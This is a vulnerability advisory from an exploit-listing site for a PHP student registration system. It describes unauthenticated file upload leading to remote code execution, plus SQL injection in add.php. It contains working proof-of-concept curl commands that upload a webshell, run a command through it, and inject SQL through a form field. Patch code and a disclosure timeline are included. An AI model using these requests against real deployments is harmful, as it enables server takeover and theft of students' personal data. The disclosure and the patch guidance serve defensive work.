Exploit for student-registration-rce-sqli-cve

## https://sploitus.com/exploit?id=1E46CB90-FFD8-54DE-90FF-8577C105192D
# CVE-2026-XXXXX

## Unauthenticated Arbitrary File Upload (RCE) + SQL Injection in Student Registration System

---

### Advisory Information

| Field | Value |
|-------|-------|
| **Ecosystem** | PHP |
| **Package/Product** | Student Registration System with Login |
| **Affected Versions** | All versions through commit `67f34dd` |
| **Patched Versions** | None |
| **Severity** | **CRITICAL (CVSS 9.8)** |
| **CWE** | CWE-434 (Unrestricted File Upload) + CWE-89 (SQL Injection) + CWE-306 (Missing Authentication) |
| **CVSS Vector** | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| **Repository** | https://github.com/kushkrg/student-registration-system-with-login-system |
| **Stars** | 29 ⭐ |

---

### Summary

The Student Registration System contains critical vulnerabilities in `add.php`: unauthenticated arbitrary file upload allowing PHP webshell deployment, and SQL injection in the student data INSERT query. The file `add.php` has no authentication check, no MIME validation, and no SQL escaping — despite the project using prepared statements in `login.php` and `register.php`.

---

### Affected Component

| Field | Value |
|-------|-------|
| **Ecosystem** | PHP |
| **Package** | kushkrg/student-registration-system-with-login-system |
| **Vendor** | kushkrg |
| **Affected Versions** | All |
| **Patched Versions** | None |
| **File** | `add.php`, `index.php`, `edit.php` |

---

### Description

`add.php` processes student registration form submissions with no authentication check and no input sanitization:

**Vulnerability #1 — Unrestricted File Upload (CWE-434):**

```php
// add.php — NO auth, NO MIME check, NO extension validation
$image = $_FILES['image']['name'];
$target = "upload_images/".basename($image);

if (move_uploaded_file($_FILES['image']['tmp_name'], $target)) {
    // File saved — attacker can upload shell.php
}
```

**Vulnerability #2 — SQL Injection (CWE-89):**

```php
// add.php — raw $_POST values in SQL, no escaping
$insert_data = "INSERT INTO student_data(u_card, u_f_name, u_l_name, ...) 
    VALUES ('$u_card','$u_f_name','$u_l_name',...,'$image',NOW())";
$run_data = mysqli_query($con, $insert_data);
```

**Note:** `login.php` and `register.php` use `mysqli_prepare()` with bound parameters — the developer knew about prepared statements but omitted them in data entry files.

---

### Proof of Concept

**Step 1 — Upload PHP webshell:**

```bash
curl -X POST "http://target/add.php" \
  -F "image=@shell.php" \
  -F "submit=1" \
  -F "card_no=1337" \
  -F "user_first_name=test"
# Webshell uploaded to upload_images/shell.php
```

**Step 2 — Execute commands:**

```bash
curl "http://target/upload_images/shell.php?cmd=id"
# uid=33(www-data) gid=33(www-data)
```

**Step 3 — SQL Injection via add.php (arbitrary INSERT):**

```bash
# Inject arbitrary student record — demonstrates SQLi in add.php
curl -X POST "http://target/add.php" \
  -F "image=@test.jpg" \
  -F "submit=1" \
  -F "card_no=1337" \
  -F "user_first_name=test" \
  -F "user_last_name=test',NOW()) -- " \
  -F "user_father=x" \
  -F "user_aadhar=x" \
  -F "user_dob=2000-01-01" \
  -F "user_gender=M" \
  -F "user_email=x@x.com" \
  -F "user_phone=1" \
  -F "state=x" \
  -F "dist=x" \
  -F "village=x" \
  -F "police_station=x" \
  -F "pincode=1" \
  -F "user_mother=x" \
  -F "family=x" \
  -F "staff_id=1"
# SQL executed: INSERT INTO student_data(...) VALUES (...'test',NOW()) -- ',...)
# Injects arbitrary values / bypasses validation via SQL comment
```

---

### Impact

| CIA | Level | Description |
|-----|-------|-------------|
| Confidentiality | **HIGH** | File upload RCE via webshell — read any server file including database |
| Integrity | **HIGH** | SQLi: arbitrary INSERT into student_data + RCE: modify any file |
| Availability | **HIGH** | RCE: delete files, drop tables, destroy server |

**Data at risk:** Student Aadhar numbers, birth dates, addresses, phone numbers, emails, photos — full PII accessible via webshell file read.

---

### Patches

```diff
+ session_start();
+ if(!isset($_SESSION['loggedin'])) { header("Location: login.php"); exit; }

+ $allowed = ['jpg','jpeg','png','gif'];
+ $ext = strtolower(pathinfo($_FILES['image']['name'], PATHINFO_EXTENSION));
+ if(!in_array($ext, $allowed)) { die("Invalid file type"); }

- $insert_data = "INSERT INTO ... VALUES ('$u_card',...)";
- mysqli_query($con, $insert_data);
+ $stmt = mysqli_prepare($con, "INSERT INTO ... VALUES (?,?,...)");
+ mysqli_stmt_bind_param($stmt, "sss...", $u_card, ...);
+ mysqli_stmt_execute($stmt);
```

---

### References

| Type | URL |
|------|-----|
| Repository | https://github.com/kushkrg/student-registration-system-with-login-system |
| Vulnerable file | https://github.com/kushkrg/student-registration-system-with-login-system/blob/main/add.php |
| CWE-434 | https://cwe.mitre.org/data/definitions/434.html |
| CWE-89 | https://cwe.mitre.org/data/definitions/89.html |
| CWE-306 | https://cwe.mitre.org/data/definitions/306.html |

---

### Verification

```bash
git clone https://github.com/kushkrg/student-registration-system-with-login-system && cd *
grep -n "move_uploaded_file" add.php                    # line 32 — no auth, no MIME
grep -n "mysqli_query.*INSERT" add.php                  # line 38 — raw SQL
head -5 add.php                                          # no session_start
grep -n "mysqli_prepare" login.php                       # dev knows prepared stmts
```

---

### Credits

| Role | Name |
|------|------|
| **Finder** | Fatullayev Asadbek |
| **Reporter** | Fatullayev Asadbek |
| **GitHub** | Kimdir01 |

---

### Timeline

| Date | Event |
|------|-------|
| 2026-06-28 | Vulnerability discovered and verified |
| 2026-06-28 | Vendor notified via private disclosure |
| TBD | Vendor acknowledgment / response |
| TBD | CVE ID assigned |
| TBD + 90 days | Coordinated public disclosure |

---

### CVSS v3.1

```
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H — 9.8 CRITICAL

AV:N — Remote over HTTP
AC:L — Simple POST request
PR:N — No authentication (add.php no session check)
UI:N — No user interaction
S:U   — Same security context
C:H   — File upload RCE via webshell: read any file (database, student PII)
I:H   — SQLi: arbitrary INSERT + RCE: modify any server file
A:H   — SQLi: INSERT garbage data + RCE: delete files, drop tables
```